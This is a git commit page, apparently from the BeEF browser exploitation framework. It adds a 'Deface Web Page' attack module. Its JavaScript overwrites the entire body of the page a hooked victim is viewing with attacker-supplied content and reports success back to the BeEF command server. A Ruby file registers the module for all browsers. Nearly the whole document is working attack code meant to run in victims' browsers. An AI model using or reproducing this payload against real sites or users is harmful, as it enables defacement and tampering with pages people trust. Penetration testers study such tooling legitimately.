porting of deface_web_page completed and tested on major browsers
git-svn-id: https://beef.googlecode.com/svn/trunk@519 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
This commit is contained in:
5
modules/commands/misc/deface_web_page/deface_web_page.js
Normal file
5
modules/commands/misc/deface_web_page/deface_web_page.js
Normal file
@@ -0,0 +1,5 @@
|
||||
beef.execute(function() {
|
||||
document.body.innerHTML = "<%= @deface_content %>";
|
||||
|
||||
beef.net.sendback("<%= @command_url %>", <%= @command_id %>, "result=Deface Succesfull");
|
||||
});
|
||||
48
modules/commands/misc/deface_web_page/deface_web_page.rb
Normal file
48
modules/commands/misc/deface_web_page/deface_web_page.rb
Normal file
@@ -0,0 +1,48 @@
|
||||
module BeEF
|
||||
module Modules
|
||||
module Commands
|
||||
|
||||
|
||||
class Deface_web_page < BeEF::Command
|
||||
|
||||
#
|
||||
# Defines and set up the command module.
|
||||
#
|
||||
def initialize
|
||||
super({
|
||||
'Name' => 'Deface Web Page',
|
||||
'Description' => 'Overwrite the body of the page the victim is on with the "Deface Content" string',
|
||||
'Category' => 'Misc',
|
||||
'Author' => 'antisnatchor',
|
||||
'Data' =>
|
||||
[
|
||||
[ 'name' => 'deface_content',
|
||||
'ui_label'=>'Deface Content',
|
||||
'type' => 'textarea',
|
||||
'value' =>'Defaced!',
|
||||
'width' => '400px',
|
||||
'height' => '100px'
|
||||
],
|
||||
],
|
||||
'File' => __FILE__,
|
||||
'Target' => {
|
||||
'browser_name' => BeEF::Constants::Browsers::ALL
|
||||
}
|
||||
})
|
||||
|
||||
use 'beef.dom'
|
||||
use_template!
|
||||
end
|
||||
|
||||
def callback
|
||||
content = {}
|
||||
content['Result'] = @datastore['result']
|
||||
save content
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
Reference in New Issue
Block a user